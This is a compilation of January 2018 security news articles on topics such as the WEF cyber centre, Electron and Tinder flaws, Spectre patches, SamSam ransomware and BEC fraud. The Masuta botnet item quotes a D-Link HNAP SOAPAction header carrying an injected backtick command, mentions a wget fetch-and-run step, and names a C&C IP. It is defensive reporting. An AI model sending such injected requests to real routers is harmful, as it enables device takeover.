The Global Centre for Cybersecurity is seen as providing a unique opportunity to promote a global public/private response to increasing cyber threats. Alois Zwinggi, managing director at the WEF and head of the new center said cybercrime is currently costing the world economy $500 billion annually and is still growing. "As such, addressing the topic is really important for us. The Forum sees a need for much greater collaboration in that space."

WEF describes five main areas of operation for the center: consolidating existing initiatives (such as its Cyber Resiliency Playbook); establishing a library of best practices; improving partners' understanding of cybersecurity; promoting a regulatory framework; and serving as a think tank for future cybersecurity scenarios (such as the fourth industrial revolution and the effect of quantum computing). Although not specified per se, a consistent theme for the new center will be global cybersecurity information sharing.

Rob Wainwright, Executive Director of Europol, said that the center has "absolutely full support from Europol." He explained that Europol, which includes the European Cybercrime Centre) can only function as well as it does because of the public/private networks it has established in Europe: "but it is not nearly enough... That's why I am so delighted that WEF, with its unique networking capability, is now establishing this Global Centre for Cybersecurity -- because it will interconnect a large, dynamic, a very important business community... and will take us to a new level of public/private cooperation."

The Global Centre for Cybersecurity will be located in Geneva, Switzerland, and will be operational in March 2018. Although under the umbrella of WEF, it will be autonomous. WEF spokesperson Georg Schmitt told SecurityWeek that it will be funded by members, with an initial investment of several million Swiss francs from the forum itself. Ongoing, he said in an email, "partner companies will have to pay a certain fee to join. Fees for governments, academia and civil society will be waived. We are planning to hire 20-30 staff this year alone."

It's not yet known how many 'government partners' will join the center. "We will be able to announce the government partners at a later stage, but to give you an impression: at our preparatory meeting in November representatives of almost 20 governments participated, including several G7 and G20 countries."

Effective threat information sharing between the public and private sectors is often seen as the holy grail of cybersecurity -- but has so far proved just as elusive. However, business, like cybercrime, is transnational; and if any organization is well-suited to tackle the problem it is a global business organization. "The announcement of the creation of a Global Security Centre at WEF is welcomed as a potentially hugely valuable way forward in coordinating the activities of nations against this scourge of modern times," Jim Palmer, CISO at ThinkMarble told SecurityWeek. "That said," he continued, "the proof of its effectiveness will be in the pudding -- adequate funding and the positive cooperation from all will be an essential enabler. As a cyber and information security company, we watch with interest."

Mark Noctor, VP EMEA at Arxan Technologies, is hopeful. "We are delighted to see a body with the global importance of the WEF addressing the growing sophistication of cyber threats," he told SecurityWeek. "This move by the WEF will help governments and international organizations to work more closely with industry, manufacturers and software providers to create safe environments and eliminate cyber threats."

But there are many who don't believe that WEF actually delivers on its potential. Bono famously described it as 'fat cats in the snow'. It has also been described as 'a mix of pomp and platitudes'. And there are many in the security industry who do not believe the new Center will achieve much.

"This is what happens when you get a bunch of politicians in a room who have no clear understanding on cybersecurity and the threats," comments Joseph Carson, Chief Security Scientist at Thycotic. "When the need to have a Global Centre for Cybersecurity is being discussed at the World Economic Forum it becomes a pointless political debate usually without industry experts' input."

Carson doesn't believe that centralizing the effort against cybercrime will be effective. "Cybersecurity is most effective when we work together collectively but decentralized. Being decentralized in cybersecurity is a strength as it reduces the risk. We have had this discussion for many years in the EU about a European Centre for Cybersecurity though in the EU, it has been important to be working as a collective and at the same time, being decentralized."

Nevertheless, the potential of a WEF-backed global cybersecurity center cannot be denied. "The Global Centre for Cybersecurity could ultimately become an organization that fosters industry change and helps to educate the market and reduce the success cybercriminals are having on a daily basis," said Sam Curry, chief security officer at Cybereason.

The question is whether the WEF can deliver. "It is premature to declare victory," he continued; "and ultimately whether or not this works is dependent upon the collaboration of enterprises and a focused and determined group of leaders. It is clear to me that there will be minimal success if the organization is filled with toothless sinecures for washed up security hacks."


Code Execution Flaw Impacts Popular Desktop Apps
24.1.2018 securityweek
Vulnerebility

A remote code execution vulnerability was addressed in the Electron framework, which powers highly popular desktop applications, including Slack, Skype, Signal, GitHub Desktop, Twitch, Wordpress.com, and others.

Created in 2013, the framework allows developers to use web technologies such as JavaScript, HTML, and CSS to develop native desktop applications. An open source project maintained by GitHub and an active community of contributors, Electron uses Chromium and Node.js and supports Windows, macOS, and Linux platforms.

There are over 460 cross-platform desktop applications using Electron, but only those that use custom protocol handlers are impacted by the vulnerability. Only applications built for Windows are affected by the bug. macOS and Linux not vulnerable.

Tracked as CVE-2018-1000006, the flaw impacts Electron applications for Windows that register themselves as the default handler for a protocol, like myapp://.

According to Electron, these applications are vulnerable regardless of how the protocol is registered (using native code, the Windows registry, or Electron's app.setAsDefaultProtocolClient API).

The vulnerability was addressed with the release of electron v1.8.2-beta.4, electron v1.7.11, and electron v1.6.16. All three releases are available for download on GitHub.

“If for some reason you are unable to upgrade your Electron version, you can append “--“ as the last argument when calling app.setAsDefaultProtocolClient, which prevents Chromium from parsing further options. The double dash “--“ signifies the end of command options, after which only positional parameters are accepted,” Electron explains.

Although only Windows applications that register themselves as handlers are affected by the remote code vulnerability, all Electron developers are advised to update their software to the latest stable version as soon as possible.


Are you a Tinder user? Watch out, someone could spy on you
24.1.2018 securityaffairs
Social

Experts at security firm Checkmarx discovered two security vulnerabilities in the Tinder mobile apps that could be exploited to spy on users.
Security experts at Checkmarx discovered two security vulnerabilities in the Tinder Android and iOS dating applications that could be exploited by an attacker on the same wi-fi network as a target to spy on users and modify their content.

Attackers can view a target user’s Tinder profile, see the profile images they view and determine the actions they take.

“The vulnerabilities, found in both the app’s Android and iOS versions, allow an attacker using the same network as the user to monitor the user’s every move on the app. It is also possible for an attacker to take control over the profile pictures the user sees, swapping them for inappropriate content, rogue advertising or other type of malicious content (as demonstrated in the research).” reads the analysis published by Checkmarx.

“While no credential theft and no immediate financial impact are involved in this process, an attacker targeting a vulnerable user can blackmail the victim, threatening to expose highly private information from the user’s Tinder profile and actions in the app.”

An attacker can conduct many other malicious activities, including intercepting traffic and launching DNS poisoning attacks.

The first issue is related to the fact that both the iOS and Android Tinder apps download profile pictures via insecure HTTP connections, this means that an attacker can access the traffic to determine which profiles are viewed by a Tinder user.

Tinder%20data%20leak
SOCIAL NETWORKS / TINDER

An attacker could also modify traffic for example to swap images.

“Attackers can easily discover what device is viewing which profiles,” continues the analysis. “Furthermore, if the user stays online long enough, or if the app initializes while on the vulnerable network, the attacker can identify and explore the user’s profile.” “Profile images that the victim sees can be swapped, rogue advertising can be placed and malicious content can be injected,”

Obviously, such kind of issue could be mitigated with the adoption of HTTPS.

Checkmarx also discovered another issue related to the use of HTTPS, the flaw was called “Predictable HTTPS Response Size”.

“By carefully analyzing the traffic coming from the client to the API server and correlating with the HTTP image requests traffic, it is possible for an attacker to determine not only which image the user is seeing on Tinder, but also which action did the user take.” states Checkmarx. “This is done by checking the API server’s encrypted response payload size to determine the action,”

An attacker that is in the position of analyzing the traffic can discover the user’s interest in a specific profile by detecting a 278-byte encrypted response that is delivered by the API server when he swipes left on a profile picture. Swiping right, the Tinder user likes a particular profile, in this case, the response generated is composed of 374 bytes.

The researchers also noticed that Tinder member pictures are downloaded to the app via HTTP connection, this makes possible for an attacker to view the profile images of those users being swiped left and right.

In order to mitigate this issue, researchers suggest padding requests, if the responses were padded to a fixed size, it would be impossible to discriminate the user’s action.

Checkmarx disclosed both vulnerabilities to Tinder.


WordPress plugins and themes vulnerabilities statistics for 2017
24.1.2018 securityaffairs
Vulnerebility

WordPress plugins and themes vulnerabilities statistics for 2017. The statistics were derived from our up-to-date WordPress Vulnerabilities Database. We are monitoring a large number of sources to add new vulnerabilities to the database on a daily basis.
The year in figures
We added 221 vulnerabilities to our database. The total number of vulnerabilities decreased by 69%. During 2017, just like in 2016, Cross-Site Scripting (XSS) has been at the top of the list. More and more WordPress plugins and themes are found to be vulnerable to Cross-Site Scripting (XSS) vulnerability. This is because many developers do not pay enough attention to escaping data output.

WordPress%20plugins%20vulnerabilities-2017
2017 has also seen a substantial rise in SQL Injection vulnerabilities. It’s surprising how many sites were put in danger by vulnerabilities found in WordPress plugins. The total number of active installs is 17,101,300+.

Total vulnerable plugins – 202
Total vulnerable themes – 5
Plugins affected by vulnerabilities in WordPress.org repository – 153
Non-WordPress.org repository plugins affected by vulnerabilities – 24
WordPress plugins vulnerabilities-2017

WordPress top 3 vulnerabilities
Cross-Site Scripting (XSS)
SQL Injection (SQLi)
Broken Access Control
Plugins by vulnerability type
XSS (Cross-Site Scripting) – 71
SQL Injection – 40
Unrestricted Access – 20
Cross Site Request Forgery (CSRF) – 12
Multi – 10
Information Disclosure – 10
Arbitrary File Upload – 7
BYPASS – 7
Arbitrary File Download – 7
PHP Object Injection – 5
Remote File Inclusion – 3
Local File Inclusion – 3
Arbitrary Code Execution – 2
Direct static code injection – 1
Directory Traversal – 1
Top 5 most popular plugins affected by vulnerabilities in 2017
Yoast SEO (most popular SEO plugin) – 5,000,000+ – XSS (Cross-site Scripting)
WooCommerce (most popular ecommerce plugin) – 3,000,000+ – XSS (Cross-site Scripting)
Smush Image Compression and Optimization – 1,000,000+ – Directory Traversal
Duplicator – 1,000,000+ – XSS (Cross-site Scripting)
Loginizer – 600,000+ – SQL Injection
Some interesting facts?
WordPress released 8 security updates in 2017 year.
The total number of vulnerabilities in the ThreatPress vulnerabilities database is 3321
First vulnerability discovered in 2005-02-20


Intel recommended to stop deploying the current versions of Spectre/Meltdown patches
24.1.2018 securityaffairs
Vulnerebility

Intel recommended OEMs, cloud service providers, system manufacturers, software vendors as well as end users to stop deploying the current versions of Spectre/Meltdown patches.
While the Linux father Linus Torvalds defines the Spectre updates “utter garbage”, Intel warns to stop installing current versions of Spectre/Meltdown patches.

Intel explained its approach in its technical note about Spectre mitigation (“Speculative Execution Side Channel Mitigations“), the tech giant addressed the issue with an opt-in flag dubbed IBRS_ALL bit (IBRS states for Indirect Branch Restricted Speculation).

The Indirect Branch Restricted Speculation, along with Single Thread Indirect Branch Predictors (STIBP) and Indirect Branch Predictor Barrier (IBPB), prevent the abuse of the prediction feature and the exploitation of the flaw.

Torvalds speculate the Intel’s decision to address the issues in this way is mainly motivated by the intention to avoid legal liability. Recalling two decades of flawed chips would have a catastrophic impact on the tech giant.

Torvalds explained that the impact of using IBRS on existing hardware is so severe that no one will set the hardware capability bits.

Users and IT companies are reporting severe problems after installing the patches, such as a significant degradation of performance and unwanted reboots.

Intel recommended OEMs, cloud service providers, system manufacturers, software vendors as well as end users to stop deploying the current versions of Spectre/Meltdown patches. The company announced to have found the root cause of reboot issued for Broadwell and Haswell platforms and is asking to wait for a fix.

The tech giant began rolling out to industry partners a beta update to address the issue.

“As we start the week, I want to provide an update on the reboot issues we reported Jan. 11. We have now identified the root cause for Broadwell and Haswell platforms, and made good progress in developing a solution to address it.”Intel said in a press release published on Monday. “Over the weekend, we began rolling out an early version of the updated solution to industry partners for testing, and we will make a final release available once that testing has been completed.”

Let’s hope Intel will release new Spectre/Meltdown patches soon


According to TrendMicro Business Email Compromise (BEC) attacks could reach $ 9 billion in 2018
24.1.2018 securityaffairs
Spam

According to a report published by the security firm TrendMicro, Business Email Compromise (BEC) attacks could reach $ 9 billion in 2018.
The report highlights the growth of damage caused by hackers who adopts new attack vectors techniques like the ones used recently by Lebanese intelligence agency Dark Caracal

According to a report published by TrendMicro, Business Email Compromise (BEC) attacks had surpassed the value of damage to enterprises in the past years and it is estimated that it could reach $ 9 billion dollars in 2018. This rising value of loss for business takes into account new attack vectors like the one from Lebanese Intelligence Agency Dark Caracal malware who utilizes malware in android application.

The report states that the FBI released a public announcement revealing that BEC attacks had become a $ 5.3 billion industry in the past years. In that regard, the report emphasizes that hackers are employing Social Engineering to lure and deceive employees in a myriad of scams to bypass security measures. By using a deep understanding of Human Psychology hackers are circumventing the defenses, as the report states ” it requires little in the way of special tools or technical knowledge to pull off, instead of requiring an understanding of human psychology and knowledge of how specific organizations work.”

The report lists how BEC attacks are usually conducted. The techniques are: Bogus invoice scheme, CEO fraud, Account compromise, Attorney impersonation and Data Theft. The report highlight that these attacks can be classified into two major groups: Credential grabbing and email only.

Business%20Email%20Compromise

The credential grabbing technique as detailed by the report has shown an increase in phishing HTML pages that are sent as spam attachments. Also, by employing malware campaign hackers target organizations. One recent example of malware is Zyklon that exploits flaws in Microsoft Office. The charts in the report shown that the attacks have doubled in the period from January to September 2017.

As discovered by researchers in the report, the two main types of malware techniques employed are keyloggers and Remote Access Tools (RAT). Since these tools are low cost and effective they can harvest all credentials on any infected machines. Malware techniques are very hard to detect by anti-virus since they are widely shared in forums or placed in applications commonly used on a daily basis. The report lists the most common malware used in Business Email Compromise attacks: AgentTesla, CyborgLogger, DarkComet, DiamondFox, Dracula Logger, iSpy Keylooger, Knight Logger and Luminosity Link.

The report also suggests how to defend and avoid against BEC attacks: Employee awareness and education, verifying emails received, verification of the legitimacy of executive requests, verification of requests from vendors and suppliers, verification of any requests and the adoption of a security culture within the organization.

Sources:

https://www.ic3.gov/media/2017/170504.aspx

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/business-email-compromise-bec-schemes

https://www.trendmicro.com/vinfo/us/security/research-and-analysis/predictions/2018

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/delving-into-the-world-of-business-email-compromise-bec

https://irishinfosecnews.wordpress.com/2018/01/18/bec-attacks-to-exceed-9b-in-2018-trend-micro/

https://www.infosecurity-magazine.com/news/new-attack-group-fires-rats-and/

https://threatpost.com/new-dridex-variant-emerges-with-an-ftp-twist/129546/

http://mashable.com/2018/01/19/dark-caracal-hackers-phish-whatsapp-and-facebook-accounts/#1p4UuGZVVSqx

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/delving-into-the-world-of-business-email-compromise-bec

https://www.darkreading.com/vulnerabilities—threats/bec-attacks-to-exceed-$9b-in-2018-trend-micro/d/d-id/1330853

https://www.csoonline.com/article/3247670/email/email-security-in-2018.html

http://www.informationsecuritybuzz.com/expert-comments/business-email-compromise-attacks-exceed-9b-2018-ironscales/

https://in.reuters.com/article/us-lebanon-cyber/lebanese-security-agency-turns-smartphone-into-selfie-spycam-researchers-idINKBN1F726S

https://www.forbes.com/sites/thomasbrewster/2018/01/18/lebanon-surveillance-hits-google-android-lookout-eff/#19ad8aef7971

http://www.computerweekly.com/news/252433527/Powerful-Zyklon-malware-exploiting-MS-Office-flaws


Satori’s threat actors are behind the new Masuta botnet that is targeting routers in the wild
24.1.2018 securityaffairs BotNet

Masuta botnet targets routers using default credentials, one of the versions analyzed dubbed “PureMasuta” relies on the old network administration EDB 38722 D-Link exploit.
Security experts at NewSky’s believe the operators of the recently discovered Satori botnet are launching a new massive hacking campaign against routers to recruit infect them and recruit in the botnet dubbed Masuta.

“We analyzed two variants of an IoT botnet named “Masuta” where we observed the involvement of a well-known IoT threat actor and discovered a router exploit being weaponized for the first time in a botnet campaign.” reads the analysis published by NewSky.

“We were able to get hands on the source code of Masuta (Japanese for “master”) botnet in an invite only dark forum. After analyzing the configuration file., we saw that Masuta uses 0xdedeffba instead of Mirai’s 0xdeadbeef as the seed of the cipher key, hence the strings in the configuration files were effectively xored by ((DE^DE)^FF) ^BA or 0x45.”

The Satori botnet is a variant of the Mirai botnet first discovered by the group of experts MalwareMustDie, it made the headlines at the end of 2016 when it was involved in hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers.

Masuta also targets routers using default credentials, one of the versions analyzed by the experts dubbed “PureMasuta” relies on the old network administration EDB 38722 D-Link exploit.

Researchers noticed a rise in the Masuta attacks since September, their honeypots observed 2400 IPs involved in the botnet in last three months and experts believe that other routers will be recruited in the next months.

Masuta-botnet.

The flaw triggered by the EDB 38722 D-Link exploit was discovered in 2015 by the researchers Craig Heffner, it affects the D-Link’s Home Network Administration Protocol.

“The weaponized bug introduced in PureMasuta botnet is in the HNAP (Home Network Administration Protocol) which itself is based on the SOAP protocol.” continues the analysis published by NewSky.

“It is possible to craft a SOAP query which can bypass authentication by using hxxp://purenetworks.com/HNAP1/GetDeviceSettings. Also, it is feasible to run system commands (leading to arbitrary code execution) because of improper string handling. When both issues are combined, one can form a SOAP request which first bypasses authentication, and then causes arbitrary code execution.”

The experts explained that a string like the following one will cause a reboot.

SOAPAction: “hxxp://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`”
An attacker can run any command inserted after ‘GetDeviceSettings’, this mechanism is used by the PureMasuta bot to run a
wget
to fetch and run a shell script and take over the target router.

The experts noticed that the command and control server (93.174.93.63) used by PureMasuta variant is the same as used in the original Masuta variants, this means that PureMasuta is an evolution of the botnet operated by the same threat actors.

NewSky attributes the Masuta botnet to an entity dubbed “Nexus Zeta”, the name comes from the C&C URL nexusiotsolutions(dot)net, this URL is the same used by the Satori botnet.


Bell Canada suffers a data breach for the second time in less than a year
24.1.2018 securityaffairs Incindent

Bell Canada is notifying customers about a data breach that exposed personal data of roughly 100,000 individuals, this is the second security breach in a few months.
Bell Canada is notifying customers about a data breach that exposed personal data of roughly 100,000 individuals, including names, phone numbers, email addresses, usernames and account numbers.

“The protection of consumer and corporate information is of primary importance to Bell,” John Watson, Executive Vice-President of Customer Experience at Bell Canada, told customers. “We work closely with the RCMP and other law enforcement agencies, government bodies and the broader technology industry to combat the growth of cyber crimes.”

The Royal Canadian Mounted Police has launched an investigation into the security breach at Bell Canada.

“We are following up with Bell to obtain information regarding what took place and what they are doing to mitigate the situation, and to determine follow up actions,” said the federal privacy watchdog’s spokeswoman Tobi Cohen.

Bell company added that there is no evidence that financial data (i.e. credit card data) has been compromised.

Bell Canada

This the second time that Bell Canada has been a victim of a data breach, in May 2017 an anonymous hacker obtained access to about 1.9 million active email addresses and about 1,700 customer names and active phone numbers.

As part of the incident response procedure, Bell confirmed to have implemented additional security measures, for accounts’ authentication.

Bell Canada advised users to monitor their financial and online accounts for unauthorized activity and recommends customers to use strong passwords and frequently change them.

The Canadian Government plans to review the Personal Information Protection and Electronic Documents Act that would require companies to notify data breaches.

Unfortunately, until now only the province Alberta has mandatory reporting requirements for private-sector companies that suffer a data breach.


Less than 10% of Gmail users enabled two-factor authentication
24.1.2018 securityaffairs Safety

According to Google software engineer Grzegorz Milka, less than 10 percent of its users have enabled two-factor authentication (2FA) for their accounts.
The availability of billions of credentials in the criminal underground due to the numerous massive data breaches occurred in the last years makes it easy for crooks to take over users’ accounts.

We always suggest enabling two-factor authentication to improve the security of our accounts, unfortunately, the suggestion is often ignored.

“Even if someone else gets your password, it won’t be enough to sign in to your account,” states Google’s page on 2FA.

According to Google software engineer Grzegorz Milka, less than 10 percent of its users have enabled two-factor authentication (2FA) for their accounts.

Considering that Google has more than 2 billion monthly active devices, the number of exposed accounts is very huge.

Milka made the disconcerting revelation at the Usenix’s Enigma 2018, two-factor authentication (2FA) implemented by Google allows its users to access the account by providing login credentials along with an authentication code sent to the user via SMS or voice call or generated through the Google mobile app.

Two-factor%20authentication
Source: The Register

This data demonstrates the lack of awareness of cyber threats and the way to mitigate them.

Many users believe that configure and use 2FA for their accounts can make their experience worse.

The Register asked Milka why Google didn’t just make two-factor mandatory across all accounts and received the following answer:

“The answer is usability,” he replied. “It’s about how many people would we drive out if we force them to use additional security.”

Contrary to what you can think, it is very easy to enable 2FA for your account, Google published a step-by-step guide.

The risk of identity theft increases when users share the same credentials among many web services.

Milka also cited a 2016 Pew study saying that only 12 percent of Americans use a password manager.

On the other side, Google is working to improve both the users’experience and security for example to employing machine learning systems that are able to spot suspicious activities related to the accounts under accounts.

For example, usually, when an attacker gets access to an account, he shuts down notification to the legitimate owner and starts exploring the content of the email by searching for passwords, license, and activation codes, cryptocurrency wallet addresses and credentials, intimate photos, and other sensitive documents, including copies of ID cards.

When Google detects one of the above actions immediately triggers mitigation countermeasures.


SamSam Operators Make $325,000 in 4 Weeks
23.1.2018 securityweek
Ransomware

Numerous SamSam attacks over the past month or so have paid off to the ransomware’s operators, as they made over $325,000 in a short period of time, security researchers with Cisco Talos say.

Starting last month, the malware began targeting organizations across multiple industries including government, healthcare and ICS in a series of attacks that appear to be rather opportunistic in nature. The impact, however, was wider, especially in the healthcare sector, where patients were affected too, not just the hit organizations.

On January 11, the ransomware hit Hancock Health, headquartered in Greenfield, Indiana, a hospital that ended up paying $55,000 to regain access to its files. Adams Memorial Hospital in Decatur, Indiana, and Allscripts, a major electronic health record (EHR) company headquartered in Chicago, IL (which confirmed to SecurityWeek that roughly 1,500 clients were impacted), were also hit by SamSam.

Other organizations were impacted as well, yet the security researchers still haven’t figured out what infection vector the attackers used. Previously, SamSam operators have been compromising a machine within the network and then moving laterally to inject code and execute the ransomware.

In a report released in March last year, Javelin Networks explained that SamSam’s operators have been using stolen domain credentials to gain access to a host, then leveraging Active Directory for reconnaissance purposes, and later moving laterally through the network.

In 2016, SamSam was observed targeting vulnerable JBoss hosts, and Cisco believes that compromised RDP/VNC servers might have been used in the recent wave of attacks, allowing SamSam operators to obtain an initial foothold.

As part of the new attacks, string obfuscation and improved anti-analysis techniques were employed. The attackers used a loader to decrypt and execute an encrypted ransomware payload, a mechanism they have been employing since at least October 2017.

The loader, a simple .NET assembly with no obfuscation, searches for files with the extension .stubbin in its execution directory, as these contain SamSam’s encrypted payload. The loader appears derived from an example posted on the Codeproject.com website.

The ransomware operators are believed to be deploying the malware manually. They also use symmetric encryption keys that are randomly generated for each file.

The actor behind the attacks was highly focused on preventing the forensic recovery of the malware sample itself and didn’t simply rely on obfuscating the running malware code. To reduce the chances of obtaining the payload for analysis, the password necessary for the loader to decrypt the payload is passed as a parameter.

Analysis of the code didn’t reveal automated mechanism for contacting a Tor address hardcoded in the malware, and Cisco believes that victim identification with the associated RSA private key is done manually or using another tool.

“The Tor onion service and the Bitcoin wallet address are hardcoded into the payload whilst the public key is stored in an external file with the extension .keyxml,” Cisco explains.

The wallet employed in this campaign was used for multiple victims, and the security researchers discovered that the first payment into the wallet was received on December 25, 2017. However, there is a chance that other Bitcoin wallets are also used.

The Bitcoin wallet address received approximately 30.4 Bitcoin at the time of analysis, meaning that the SamSam operators made over $325,217.07 since December 25. Within its first year of operation, between 2015 and 2016, SamSam is believed to have made its operators $450,000 richer.

One thing that SamSam victims should keep in mind, however, is that the ransomware does not delete Volume Shadow Copies. It also works by creating an encrypted version of the targeted file and then deleting the original using the regular Windows API.

“Although unlikely, due to block overwriting, recovery of the original files from the versions of affected folders saved by the operating system may be possible,” Cisco says.


HP, Dell Halt BIOS Updates Over Buggy CPU Patches
23.1.2018 securityweek
Vulnerebility

Dell, HP and other system manufacturers have advised customers not to install the recent BIOS updates designed to address the Spectre and Meltdown CPU vulnerabilities due to unstable code delivered by Intel.

The Spectre and Meltdown vulnerabilities, which allow malicious applications to bypass memory isolation mechanisms and access sensitive data, were disclosed on January 3, one week before initially planned. As a result, vendors rushed to roll out patches and many of them turned out to be unstable.

Both software and firmware patches have caused problems. On Monday, Intel told users to stop deploying microcode updates that fix Spectre and Meltdown until it addresses issues that led to reboots and other unpredictable system behavior.

Intel initially said only systems running Broadwell and Haswell CPUs experienced more frequent reboots, but similar behavior was later observed on Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms as well.

The company now says it has identified the root cause of the reboot issue and is “making good progress in developing a solution to address it.” In the meantime, it has advised OEMs, system manufacturers, software vendors, and cloud service providers to stop deploying current versions.

Following Intel’s announcement, Dell told customers not to deploy the BIOS updates designed to address one of the Spectre vulnerabilities, specifically CVE-2017-5715, which is known as “Variant 2.”

“Dell is advising that all customers should not deploy the BIOS update for the Spectre (Variant 2) vulnerability at this time. We have removed the impacted BIOS updates from our support pages and are working with Intel on a new BIOS update that will include new microcode from Intel,” the company said.

Dell told users who have already deployed the BIOS updates to revert to a previous version until the issue has been resolved.

HP has also removed BIOS softpaqs from its website and expects to reissue updates with previous Intel microcode starting with January 25.

Lenovo informed customers that it has pulled UEFI firmware updates for systems with Intel Broadwell and Haswell processors.

VMware has also decided to delay new releases of microcode updates until Intel addresses these problems.

Some systems running Red Hat and Ubuntu operating systems failed to boot after Spectre and Meltdown patches were installed.

The Meltdown attack relies on one vulnerability, tracked as CVE-2017-5754, but there are two main variants of the Spectre attack, including CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2).

Meltdown and Variant 1 of Spectre can be patched efficiently with software updates, but Variant 2 requires microcode updates for a complete fix. While some software updates have also been known to cause problems, vendors have still advised users to deploy them in order to protect their systems against potential attacks.

“The current unstable code for the Spectre and Meltdown CPU patches leaves end users vulnerable with no available options other than to wait for a stable fix. In times like these, customers should be extra vigilant to ensure they have not been compromised. Network traffic analytics should be used to monitor their environment for anomalous traffic patterns and unusual behaviors,” Bob Noel, Director of Strategic Relationships and Marketing for Plixer, told SecurityWeek.

“The secondary problem this unstable patch code creates is a general hesitancy for end users to quickly apply future patches. Early adopters of these patches experienced hardware reboots and downtime, which is likely to leave them wary of becoming early adopters for future patches,” Noel added.


IoT Devices Fuel Complex DDoS Attacks: Report
23.1.2018 securityweek IoT

The continuous use of compromised Internet of Things (IoT) devices to launch distributed denial of service (DDoS) attacks has helped cybercriminals increase the complexity of their assaults, NETSCOUT’s Arbor Networks says.

According to the company’s 13th Annual Worldwide Infrastructure Security Report (WISR), attackers focused on increasing complexity in 2017, and the exploitation of IoT devices helped them achieve this goal. The frequency of attacks has increased as well, following a trend seen for the past several years.

The report is based on 390 responses received from a mix of Tier 1, Tier 2 and Tier 3 service providers, hosting, mobile, enterprise and other types of network operators globally. More than half of respondents are headquartered and operate in North America.

Last year, 57% of enterprise, government and education (EGE) respondents and 45% of data center operators had their network resources depleted due to DDoS attacks. Arbor observed 7.5 million DDoS attacks in 2017.

The largest attack reported by a service provider peaked at 600 Gigabits per second (Gbps), with only one quarter of respondents observing attacks that peaked at over 100Gbps. While the number of very large incidents decreased, however, attackers used more metered attack volumes to achieve their goals, the report reads.

Attack durations surged last year, with 29% of service providers saying they experienced attacks of over 12 hours. 45% of respondents said they experienced more than 21 attacks per month, while 17% were hit more than 500 times per month.

Service providers reported more volumetric attacks, while enterprises noticed a 30% increase in stealthy application-layer attacks. Multi-vector attacks hit 59% of service providers and 48% of enterprises, combining high volume floods, application-layer attacks, and TCP-state exhaustion assaults in a single sustained offensive.

The number of enterprises experiencing stealthy application-layer attacks increased 30% last year. 73% of the attacks targeted HTTP, 69% targeted DNS, and 68% targeted HTTPS. The number of assaults targeting encryption servers went up as well, with 53% of detected attacks aimed at the application layer and 42% of them targeting the SSL/TLS protocol.

Organizations appear to better understand the need for defenses and 77% of responding enterprises said DDoS was either a part of their business or their IT risk assessments in 2017.

DDoS attacks had various but more severe consequences, ranging from reputation/brand damage (57% of respondents) and concerns of customer churn (48% of respondents). The financial impact of DDoS attacks was double compared to 2016, as 56% of respondents admitted to losses of between $10,000 and $100,000.

The increase in threat landscape’s complexity challenged network and security teams. 88% of service providers said they use Intelligent DDoS Mitigation Solutions, while 36% revealed they employ technology that automates DDoS mitigation.

Demand for managed security services is increasing as well, driven by a surge in attack frequency, and 38% of enterprises revealed they rely on third-party and outsourced services (up from 28% the previous year). However, only 50% of respondents said they carried out defensive drills.

Nearly half of respondents have difficulty hiring and retaining skilled personnel. Thus, organizations have less time to conduct incident response training. Fewer organizations and service providers are carrying out defensive drills or plan on doing so, the report reveals.

“Attackers focused on complexity this year, leveraging weaponization of IoT devices while shifting away from reliance on massive attack volume to achieve their goals. Attackers have been effective, and the proportion of enterprises experiencing revenue loss due to DDoS nearly doubled this year, emphasizing the significance of the DDoS threat,” said Darren Anstee, NETSCOUT Arbor Chief Technology Officer.

Ransomware was the most commonly experienced attack last year, with DDoS in second place, but DDoS represented the top threat observed by service providers. Such assaults remain the top concern for 88% of these organizations in 2018 as well, fueled by the weaponized IoT botnets and the attackers’ ability to gain access to sophisticated assault techniques.


Facebook Offers $100,000 Grants for Improving Internet Security
23.1.2018 securityweek
Social

Facebook announced on Monday that it’s prepared to award $100,000 grants for research proposals focusing on improving online security, privacy and safety.

The new project, called “Secure the Internet Grants,” is part of the initiative announced last summer by Facebook CSO Alex Stamos. Stamos revealed at the Black Hat conference that the social media giant had prepared $1 million in funding to encourage original defensive research.

For Secure the Internet Grants, university researchers and faculty, NGOs, and non-profit organizations have been invited to submit proposals for innovative and practical technology. A wide range of topics are accepted, including anti-phishing, user safety, post-password authentication, abuse detection and reporting, privacy-preserving technologies, and user security in emerging markets.Facebook launches Secure the Internet Grants

Applicants are required to submit a 2-page proposal detailing their ideas and how the grant funding will be used to put them into practice. Facebook is prepared to award up to $100,000 per proposal, depending on the specific requirements.

The deadline for submitting proposals is March 30. Selected award recipients will be notified in May and winners will be announced at Black Hat USA 2018.

“Good defense comes from understanding offense,” Stamos said last year at Black Hat. “The research presented at Black Hat and elsewhere is critical in understanding the kinds of flaws we face now and in the future, and it helps us build a base of knowledge that can be used to design more trustworthy systems. That being said, the balance of incentives is a bit off, and we need to figure out ways to encourage and celebrate risk-taking defensive research alongside spectacular vulnerability demonstrations.”

Facebook has made significant investments in securing its own platform and the Internet in general.

Last year, Facebook awarded $100,000 to a team of researchers as part of the 2017 Internet Defense Prize for designing a novel technique of detecting spear-phishing attacks in enterprise environments.

As for its own platform, the social media company paid out nearly $900,000 last year for vulnerabilities reported by external researchers, bringing the total paid since the launch of its bug bounty program in 2011 to more than $6.3 million.

Facebook’s founder and CEO, Mark Zuckerberg, recently stated that protecting the community is more important than maximizing profits.


Insurers, Nonprofits Most Likely to Fall for Phishing: Study
23.1.2018 securityweek
Phishing

The employees of insurance companies and non-profit organizations are most likely to fall for phishing attacks, according to a study conducted by security awareness training firm KnowBe4.

KnowBe4’s study is based on data collected from six million users across 11,000 organizations. The company has tested users at three stages: before any awareness training, after 90 days of initial training and simulated phishing, and after one year of training.

The average phish-prone percentage, represented by the percentage of employees that clicked on a link or opened an attachment during testing, was 27% across all industries and organizations of all sizes.

In the case of small and mid-size organizations (under 1,000 employees), insurance companies have the highest percentage of phish-prone employees, specifically 35% and 33%. In the case of large organizations, nonprofits are at the top of the list with roughly 31% of employees taking the bait during the baseline phishing tests conducted by KnowBe4.

The lowest phish-prone percentage was recorded in large business services organizations, where only 19% of employees took the bait.

